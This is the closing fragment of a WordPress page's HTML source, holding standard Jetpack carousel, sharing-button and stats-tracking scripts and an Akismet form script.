name=\"url\" class=\"jp-carousel-comment-form-field jp-carousel-comment-form-text-field\" id=\"jp-carousel-comment-form-url-field\" \/><\/fieldset>"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/carousel/jetpack-carousel.min.js?ver=9.3.1' id='jetpack-carousel-js'></script>
<script async="async" type='text/javascript' src='http://oiguassu.com/wp-content/plugins/akismet/_inc/form.js?ver=4.1.8' id='akismet-form-js'></script>
<script type='text/javascript' id='sharing-js-js-extra'>
/* <![CDATA[ */
var sharing_js_options = {"lang":"en","counts":"1","is_stats_active":"1"};
/* ]]> */
</script>
<script type='text/javascript' src='http://oiguassu.com/wp-content/plugins/jetpack/_inc/build/sharedaddy/sharing.min.js?ver=9.3.1' id='sharing-js-js'></script>
<script type='text/javascript' id='sharing-js-js-after'>
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-twitter', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtwitter', 'menubar=1,resizable=1,width=600,height=350' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-facebook', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomfacebook', 'menubar=1,resizable=1,width=600,height=400' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-telegram', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomtelegram', 'menubar=1,resizable=1,width=450,height=450' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-skype', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomskype', 'menubar=1,resizable=1,width=305,height=665' );
				return false;
			});
var windowOpen;
			jQuery( document.body ).on( 'click', 'a.share-linkedin', function() {
				// If there's another sharing window open, close it.
				if ( 'undefined' !== typeof windowOpen ) {
					windowOpen.close();
				}
				windowOpen = window.open( jQuery( this ).attr( 'href' ), 'wpcomlinkedin', 'menubar=1,resizable=1,width=580,height=450' );
				return false;
			});
</script>
<script src='https://stats.wp.com/e-202107.js' defer></script>
<script>
	_stq = window._stq || [];
	_stq.push([ 'view', {v:'ext',j:'1:9.3.1',blog:'12891280',post:'30624',tz:'-3',srv:'oiguassu.com'} ]);
	_stq.push([ 'clickTrackerInit', '12891280', '30624' ]);
</script>
</body>
</html>